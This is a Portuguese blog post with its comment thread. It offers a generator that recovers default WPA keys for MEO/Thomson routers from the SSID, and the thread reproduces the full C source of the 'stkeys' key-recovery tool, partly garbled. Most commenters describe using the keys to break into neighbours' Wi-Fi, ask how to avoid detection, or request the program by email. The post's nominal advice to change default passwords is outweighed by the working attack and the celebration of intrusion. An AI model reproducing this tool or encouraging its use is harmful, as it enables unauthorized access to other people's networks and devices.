Chaves WEP e WPA por defeito nos routers MEO
3, Abril, 2009
A todos os que utilizam meo, aconselho vivamente a alterarem as passwords wireless wep ou wpa por defeito para passwords vossas, desta maneira mostro que é possível através do ssid descobrir qual a key que vêm por defeito no router.
O algoritmo de calculo é bastante simples, mais tarde irei explicar o método de obtenção das mesmas.
Aqui em baixo basta colocarem os números e letras do ssid e darvos-à a chave wpa predefinida do router.
MEO Keys
ola… nao consigo encontrar a pasword certa sera que me podem ajudar ???
Número diário atingido… Bem, não há nada como usar a cabeça
PS: A chave funcionou!!! É com o algoritmo que está no vosso site?
Fixe… Já vão 2
Entro noutro vizinho, saco outra senha… Nhac nhac nhac xD
@Wilson Silva
Sim é através do algoritmo que está aqui divulgado.
Já agora, peço muitas desculpas pelo excesso de comentários, mas fiquem empolgado. Não é todos os dias que se arranja 4 redes para se entrar com acesso ao router e tudo. Vou ver se crio um programa que gere as chaves usando esse algoritmo.
O engraçado é o anúncio ser “Meo, o comando é MEU”, quando na verdade o utilizador nem sabe que não tem o comando…
Já agora, nesse router, estou a ter dificulddade em aceder remotamente à minha máquina.Tenho atribuida na partilha de aplicações o servidor FTP, mas nada parece dar.
Será possivel configurar outro router na minha meo.Já consegui obter internet, mas TV nada
Obrigado pela ajuda
Ldsilva
Boa bola amigo.
Tenho à vista 6(seis) redes… Mas falta-me esse ficheiro milagroso?
Envia-mo p.f.
jtab1948@gmail.com
Obrigado
Boas!!
É possível mandares-me o ficheiro uma vez que é necessário estar na net para ver a chave e não era isso que pretendia, queria era não estar na net e ver a chave:) ??
augusto.joao@gmail.com
Obrigado e bom post!!
João Augusto
boas ..a net dis ligado com a senha gerada….mas n da na mesma :S sera que alguem me pode ajudar?
se me conseguirem enviar email com isso. agradeço imenso, obrigado
olhe eu ja tive uma chave mas ela deixou de dar acho que o codigo modou e eu gostaria de saber se a mais alguma maneira de entrar na rede fico a espera de respostas
E se não souber o ssid do router,o que faço?
Boas, andei a tentar criar um programinha em Java para gerar as ditas passwords, pois ter um site para cria-las nao e muito util quanto queremos entrar nos routers para aceder a dita internet.
Ainda sou iniciado em Java (entrei este ano na univ), logo estou a ter grandes dificuldades em criar um programa funcional.
Sera possivel enviar-me o codigo para achar as passwords? Depois posso converter para java e partilhar =)
PS : isto e o que tenho, a idea era conseguir gerar atravez do numero de serie primeiro, para depois entao melhorar o programa para apenas precisar de um SSID : http://pastie.org/private/egt7shph1n6psdc5nvdaeg
Onde e como arranjo o algoritmo sou um nabo nestas cenas alguem me pode explicar…
Cumps
Porque e que a pass que me dao nao e a que corresponde ?
Tenhão atenção pois está com um erro. Se escreverem o ssid com letras maiusculas a passwor que dá não funciona, têm de escrever em minusculas.
Boas. eu tenho uma pergunta, eu tenho a internet do programa e-escola e também tenho MEO e quero também usufruir da internet da mesma, já que a do e-escola so tem 1GB por mes de tráfeco, será que se eu começar a usar a internet da MEO vou pagar mais ao final do mês por usar a partir deste código?
Se alguem me puder responder, agradeço.
Obrigado.
Por acaso ninguem conhece um programa identico mas para os routers da ZON…dava-me jeito!!cump’s e obrigado
Bem fixe. Comigo tambem funcionou… mas o meu vizinho deve ter dado conta, pk passado uns tempos, a net deixou de dar, embora continue com ligação e excelente… mas nao abre nenhuma pag. n sei. vou ter de mudar de casa lol
cumps
Tiago:
o acesso usando a pen com 1GB é um acesso via modem.. Se desligares a pen, e ligares a tua antena (interna) wi-fi, então o acesso à net é por outro servidor, e não contabiliza para a Pen…
Percebeste?
Só um comentário ao inicio da noticia: porque raio é que deveriamos mudar a pass do nosso acesso MEO? Em casa dos meus pais temos MEO e eu não me importo nada que os vizinhos acedam… Aliás, não será melhor isso, do que termos dezenas de rede wi-fi a encher o ar que respiramos de radiação? Sim eu sei que energeticamente falando não são muito poderosas (são ondas rádio) mas mesmo assim, chateia-me imenso ter 10 vizinhos e 10 redes wi-fi….
Vamos lá partilhar a rede com quem não quer tar a pagar balúrdios para ter acesso preferencial em larga banda!
@Nuno
, se querem partilhar a net, acho bem que sim, mas deverá ser partilhada com restrições para que situações dessas não sucedam …
Sim Nuno entendo o teu ponto de vista e acabo por te dar uma certa razão, agora o que não te podes esquecer, é que com esta situação toda do cyber-crime e tudo mais, não poderá o teu pai ser prejudicado por um vizinho sacar uns filmes ou umas musicas, ou até mesmo usar a ligação do teu pai para fazer ataques
boas quando a vizinhança da nomes a rede existe alguma maneira de obter ou ver o ssid? ou mudar o nome a rede tem algo a ver com a pass?
João Carlos,
Vi o teu programa por alto… não fizeste interface gráfica?
De qualquer modo, amanhã com tempo testo o teu código!
Abraço
P.S.- Porque raio não está o gerador de passwords aqui já? lol
/*
stkeys v1.0 – Recover default WPA key for Thomson routers using default SSID
only generates keys between 2004 and 2009
compile: g++ -s stkeys.c -ostkeys
example:
C:\>stkeys 3983bc
[*] Generating keys for 2004
[*] Generating keys for 2005
[*] Generating keys for 2006
[*] Generating keys for 2007
[*] Generating keys for 2008
[+] Serial Number: CP0827**HHJ – potential key = B6D27F2D2F
[*] Generating keys for 2009
[*] Seconds elapsed:6 – keys per second:2426112
April 2008 – wyse101 0×40 gmail.com
*/
#include
#include
#include
#include
#include
#define SERIAL_LENGTH 12
#define ROTATE_LEFT(a,n)(((a)<>(32-(n))))
#define ROTATE_RIGHT(a,n) (((a)>>(n)) | (((a) & 0xffffffff)<> 8L) | ((x & 0x00FF00FF) << 8L) ),16L)
typedef struct _SHA_MSG {
unsigned long W[80];
} sha1_key;
unsigned long ssid;
unsigned long sha1_hash[5];
sha1_key yy_schedules[16];
sha1_key ww_schedules[64];
sha1_key xxx_schedules[4][64];
sha1_key *x1_schedules = &xxx_schedules[0][0];
sha1_key *x2_schedules = &xxx_schedules[1][0];
sha1_key *x3_schedules = &xxx_schedules[2][0];
sha1_key x1_buffer;
sha1_key x2_buffer;
sha1_key x3_buffer;
sha1_key week_buffer;
sha1_key year_buffer;
unsigned long long iterations = 0;
void expand(sha1_key *dst, sha1_key *src)
{
for(int i = 0;i W[i] = bswap(src->W[i]);
for(int i = 16;i W[i] = ROTATE_LEFT((dst->W[i-3] ^ dst->W[i-8] ^ dst->W[i-14] ^ dst->W[i-16]),1);
}
void init_yy(void)
{
unsigned char buffer[64]={0};
for(int year = 4;year <= 9;year++) {
memset(buffer,0,sizeof(buffer));
buffer[0] = 'C';
buffer[1] = 'P';
buffer[2] = '0';
buffer[SERIAL_LENGTH] = 0×80;
((unsigned long*)buffer)[15] = bswap(SERIAL_LENGTH * 8);
buffer[3] = year + '0';
expand(&yy_schedules[year-4],(sha1_key*)buffer);
}
}
void init_ww(void)
{
unsigned char buffer[64]={0};
for(int week = 1;week > 4)])
#define hexlsb(x)(hexTable[ (x & 0x0f)])
void init_xxx(void)
{
unsigned char buffer[64];
for(int i = 0;i < 3;i++)
{
for(int x1 = 0;x1 < 36;x1++)
{
memset(buffer,0,sizeof(buffer));
buffer[2*i+6] = hexmsb(charTable[x1]);;
buffer[2*i+7] = hexlsb(charTable[x1]);;
expand(&xxx_schedules[i][x1],(sha1_key*)buffer);
}
}
}
#define F(b,c,d) ((((c) ^ (d)) & (b)) ^ (d))
#define G(b,c,d) ((b) ^ (c) ^ (d))
#define H(b,c,d) (((b) & (c)) | (((b) | (c)) & (d)))
#define I(b,c,d) ((b) ^ (c) ^ (d))
#define sha1_ff(a,b,c,d,e,i) \
(e) = x3_buffer.W[i] + (e) + 0x5a827999L + ROTATE_LEFT((a),5) + F((b),(c),(d)); \
(b) = ROTATE_RIGHT((b),2);
#define sha2_gg(a,b,c,d,e,i) \
(e) = x3_buffer.W[i] + (e) + 0x6ed9eba1L + ROTATE_LEFT((a),5) + G((b),(c),(d)); \
(b) = ROTATE_RIGHT((b),2);
#define sha3_hh(a,b,c,d,e,i) \
(e) = x3_buffer.W[i] + (e) + 0x8f1bbcdcL + ROTATE_LEFT((a),5) + H((b),(c),(d)); \
(b) = ROTATE_RIGHT((b),2);
#define sha4_ii(a,b,c,d,e,i) \
(e) = x3_buffer.W[i] + (e) + 0xca62c1d6L + ROTATE_LEFT((a),5) + I((b),(c),(d)); \
(b) = ROTATE_RIGHT((b),2);
void sha1_block(void)
{
register unsigned long a,b,c,d,e;
a = (unsigned long)0x67452301L;
b = (unsigned long)0xefcdab89L;
c = (unsigned long)0x98badcfeL;
d = (unsigned long)0x10325476L;
e = (unsigned long)0xc3d2e1f0L;
sha1_ff(a,b,c,d,e, 0);
sha1_ff(e,a,b,c,d, 1);
sha1_ff(d,e,a,b,c, 2);
sha1_ff(c,d,e,a,b, 3);
sha1_ff(b,c,d,e,a, 4);
sha1_ff(a,b,c,d,e, 5);
sha1_ff(e,a,b,c,d, 6);
sha1_ff(d,e,a,b,c, 7);
sha1_ff(c,d,e,a,b, 8);
sha1_ff(b,c,d,e,a, 9);
sha1_ff(a,b,c,d,e,10);
sha1_ff(e,a,b,c,d,11);
sha1_ff(d,e,a,b,c,12);
sha1_ff(c,d,e,a,b,13);
sha1_ff(b,c,d,e,a,14);
sha1_ff(a,b,c,d,e,15);
sha1_ff(e,a,b,c,d,16);
sha1_ff(d,e,a,b,c,17);
sha1_ff(c,d,e,a,b,18);
sha1_ff(b,c,d,e,a,19);
/* ================ */
sha2_gg(a,b,c,d,e,20);
sha2_gg(e,a,b,c,d,21);
sha2_gg(d,e,a,b,c,22);
sha2_gg(c,d,e,a,b,23);
sha2_gg(b,c,d,e,a,24);
sha2_gg(a,b,c,d,e,25);
sha2_gg(e,a,b,c,d,26);
sha2_gg(d,e,a,b,c,27);
sha2_gg(c,d,e,a,b,28);
sha2_gg(b,c,d,e,a,29);
sha2_gg(a,b,c,d,e,30);
sha2_gg(e,a,b,c,d,31);
sha2_gg(d,e,a,b,c,32);
sha2_gg(c,d,e,a,b,33);
sha2_gg(b,c,d,e,a,34);
sha2_gg(a,b,c,d,e,35);
sha2_gg(e,a,b,c,d,36);
sha2_gg(d,e,a,b,c,37);
sha2_gg(c,d,e,a,b,38);
sha2_gg(b,c,d,e,a,39);
/* ================ */
sha3_hh(a,b,c,d,e,40);
sha3_hh(e,a,b,c,d,41);
sha3_hh(d,e,a,b,c,42);
sha3_hh(c,d,e,a,b,43);
sha3_hh(b,c,d,e,a,44);
sha3_hh(a,b,c,d,e,45);
sha3_hh(e,a,b,c,d,46);
sha3_hh(d,e,a,b,c,47);
sha3_hh(c,d,e,a,b,48);
sha3_hh(b,c,d,e,a,49);
sha3_hh(a,b,c,d,e,50);
sha3_hh(e,a,b,c,d,51);
sha3_hh(d,e,a,b,c,52);
sha3_hh(c,d,e,a,b,53);
sha3_hh(b,c,d,e,a,54);
sha3_hh(a,b,c,d,e,55);
sha3_hh(e,a,b,c,d,56);
sha3_hh(d,e,a,b,c,57);
sha3_hh(c,d,e,a,b,58);
sha3_hh(b,c,d,e,a,59);
/* ================ */
sha4_ii(a,b,c,d,e,60);
sha4_ii(e,a,b,c,d,61);
sha4_ii(d,e,a,b,c,62);
sha4_ii(c,d,e,a,b,63);
sha4_ii(b,c,d,e,a,64);
sha4_ii(a,b,c,d,e,65);
sha4_ii(e,a,b,c,d,66);
sha4_ii(d,e,a,b,c,67);
sha4_ii(c,d,e,a,b,68);
sha4_ii(b,c,d,e,a,69);
sha4_ii(a,b,c,d,e,70);
sha4_ii(e,a,b,c,d,71);
sha4_ii(d,e,a,b,c,72);
sha4_ii(c,d,e,a,b,73);
sha4_ii(b,c,d,e,a,74);
sha4_ii(a,b,c,d,e,75);
sha4_ii(e,a,b,c,d,76);
sha4_ii(d,e,a,b,c,77);
sha4_ii(c,d,e,a,b,78);
sha4_ii(b,c,d,e,a,79);
sha1_hash[0] = a + (unsigned long)0x67452301L;
sha1_hash[1] = b + (unsigned long)0xefcdab89L;
sha1_hash[2] = c + (unsigned long)0x98badcfeL;
sha1_hash[3] = d + (unsigned long)0x10325476L;
sha1_hash[4] = e + (unsigned long)0xc3d2e1f0L;
}
#define SHA1_SET_KEY(next,previous,current) \
{ \
for(size_t i = 0;i < sizeof(sha1_key) / sizeof(unsigned long);i += 4) { \
next.W[i+0] = (previous.W[i+0] ^ current.W[i+0]); \
next.W[i+1] = (previous.W[i+1] ^ current.W[i+1]); \
next.W[i+2] = (previous.W[i+2] ^ current.W[i+2]); \
next.W[i+3] = (previous.W[i+3] ^ current.W[i+3]); \
} \
}
void gen_serials(void)
{
unsigned char serial[8]={0};
serial[0] = 'C';
serial[1] = 'P';
serial[2] = '0';
for(int year = 0; year <= 5; year++) {
printf("\n\n[*] Generating keys for 200%d",year+4);
memcpy(&year_buffer,&yy_schedules[year],sizeof(sha1_key));
for(int week = 0; week < 52; week++) {
SHA1_SET_KEY(week_buffer,year_buffer,ww_schedules[week]);
for(int x1 = 0; x1 < 36; x1++) {
SHA1_SET_KEY(x1_buffer,week_buffer,x1_schedules[x1]);
for(int x2 = 0; x2 < 36; x2++) {
SHA1_SET_KEY(x2_buffer,x1_buffer,x2_schedules[x2]);
for(int x3 = 0; x3 < 36; x3++) {
SHA1_SET_KEY(x3_buffer,x2_buffer,x3_schedules[x3]);
sha1_block();
if( (sha1_hash[4] & 0x00FFFFFF) == ssid) {
serial[3] = (year + 4 ) + '0';
serial[4] = ((week + 1) / 10) + '0';
serial[5] = ((week + 1) % 10) + '0';
printf("\n\t[+] Serial Number: %s**%c%c%c – potential key = %08lX%02X",
serial,charTable[x1],charTable[x2],charTable[x3],
sha1_hash[0],((unsigned char*)&sha1_hash)[7]);
}
iterations++;
}
}
}
}
}
}
int main(int argc, char *argv[])
{
unsigned long keys,seconds;
time_t start_time;
size_t ssidLen;
if(argc != 2) {
puts("\n\t"
"STkeys v1.0 – default WPA key recovery for Thomson routers"
"\n\t(x) June 2008 – wyse101 0×40 gmail.com");
printf("\n\tUsage: stkeys \n”);
return 0;
}
if((ssidLen = strlen(argv[1])) != 6) {
printf(“\nInvalid SSID length: %s”,argv[1]);
return 0;
}
for(size_t i = 0;i 0) ? (iterations / seconds) : iterations;
printf(“\n\n[*] Seconds elapsed:%lu – keys per second:%lu\n”,seconds,keys);
return 0;
}
podiam por tambem as chaves das redes (fast) porfavor metam eu apanho uma mas nao a descobro a chave porfavor respondam o mais rapido possibel
Boas!!
É possível mandares-me o ficheiro uma vez que é necessário estar na net para ver a chave e não era isso que pretendia, queria era não estar na net e ver a chave.
Sou estudante e aqui perto tenho varios clientes meo mas nao tenho net para poder gerar as chaves.
Obrigado e bom post!!
Não consigo entrar num aparelho Thomson. Estou com algumas dúvidas. Alguém me pode ajudar sff
Boas pessoal…
Tambem nao consigo entrar no do meu vizinho. Pus o meu SSID para testar e obtive a password que ta por baixo do router. Mas quando meto o SSID do meu vizinho dá me uma password e eu tento aceder, mas dá!
O que será? Provalvelmente ele deve ter alterado a pass, mas mesmo assim nao ha maneira de descobrir?
Fico a espera de alguma ajuda da vossa parte!
Abraços.
Alguem sb descodificar as redes da ZON? Obgigaduo
O meu browser não suporta frames!
Alguém sabe o link directo para o frame é que o campo para prencher se encontra!?
obrigado
quer dizer atravez do ip nao se sabe quem é , mas entrando no pc e vascolhando pode ser que veija alguma foto ou documento com o nome da pessoa, ou até mesmo o nome do pc, caso seija algum maluco que ponha o próprio nome loool, mas ja vi de tudo….
gracias pelo site exelente…
falando agora …
Não sou nenhum técnico de computadores, mas sei algumas coisas, sobre hackear sei o que me faz falta , posso afirmar que ja invadi sites mas só para conhecimento…
Bom…
No meu ver acho bem se saber a chave de rede, imaginem uma criança pobre que atraves da escola recebe o pc/magalhaes (com escalão A não paga o pc)e como os pais não tem uma vida boa nao pode aceder, passar o tempo, … (criança ou rapaz tipo 12 anos)
Quem neste site não gosta de ir a net nem que seija ao hi5, facebook, sonico, workout, ao MESSENGER que tanto se utiliza pelos mais novos…
Pois bem qualquer criança tem o direito de se divertir, e principalmente de aprender, por acaso nao mora nenhuma por perto de mim pois eu ja lh tinha dado a pass da minha rede…
alguem com duvidas para aceder a net no magalhaes? postem aki simples, facil e eficaz sao so 7 letras a pass, mas atençao crianças a usar a net é sempre bom ter um pai a vigiar os sites percorridos pelo filho/a…
Uma ferramenta muito útil. Parabéns ao autor.
as passes que me dao nao estao correctas, o q posso fazer?
Olá boas a todos.
Eu tenho o serviço MEO em minha casa, para que isto não aconteça,é muito simples….não tem pass…é livre para toda a gente aceder.
Se todos fizessem o mesmo era livre e eu sempre queria ver onde chegavam os lucros das operadoras.
Será que me podem enviar o programinha para defenir essas senhas?? se puderem enviar para o meu email desde já agradeço celiokora@hotmail.com Obrigado a todos/as
eu entrei só que o meu problema é se haverá alguma hipotese do proprietario deste thomson descubrir que eu estou a utilizar a internet que é dele ?
Ola , Não consigo descobrir o codigo de um thomson D608BC_1 se algem ne poder ajudar agradecia
obrigado
Boas Noites a Todos
Bem eu mudei de casa recentemente e estou sem acesso de internet, testei o vosso “programa” em varias redes Thomson, ele encontra as senhas mas eu ao colocalas no windows ele diz que nao tenho acesso! ja testei em 3 redes diferentes e deu igual, o meu windows e (vista)32b.
Se alguem me podesse ajudar ficaria agradecido
Comprimentos
@Kubila
ADICIONA.ME kubila1992@hotmail.com
será possivél obter keys se o nome da rede ja foi alterado???
podiam fazer para os da ZON
eu utilizai o mesmo Windows e de certo
Oi, Narg. Consigo entrar em algumas, mas noutras diz-me que tem acesso á Internet, mas na verdade não estou ligado á web. Sabes o que será?
Por vezes oo router pode não estar ligado à internet, nada como aceder ao mesmo e verificar, em 192.168.1.254 caso o ip nao tenha sido mudado
Não tenho a certeza se as chaves de rede zon são geradas seguindo alguma logica, não tenho routers suficientes (tenho 0) para verificar as semelhanças entre eles.
Boas, será que alguem me podia enviar o tal fixeiro caido dos ceus?? O meu predio todo á Zon e eu apanho 4 redes com sinal excelente. Ficarei agradecido para a vida todas;)
Ok, Narg, mas se não me consigo ligar a ele, como é que se quer consigo verificar o IP dele? Não tou a perceber muito bem…
@nepereiralage
Normalmente, a menos que o DHCP esteja desactivado, quando te ligares a uma rede meo, se a tua ligação fôr buscar um ip é porque o router está lá e atribuiu um ip ao teu computador, pode é o router estar depois a bloquear as comunicações por Mac address.
No teu caso sendo assim ainda n percebi bem qual é a situação real, se ligas ao router e nao tens net é uma coisa, se nem sequer consegues ligar à rede wireless é outra…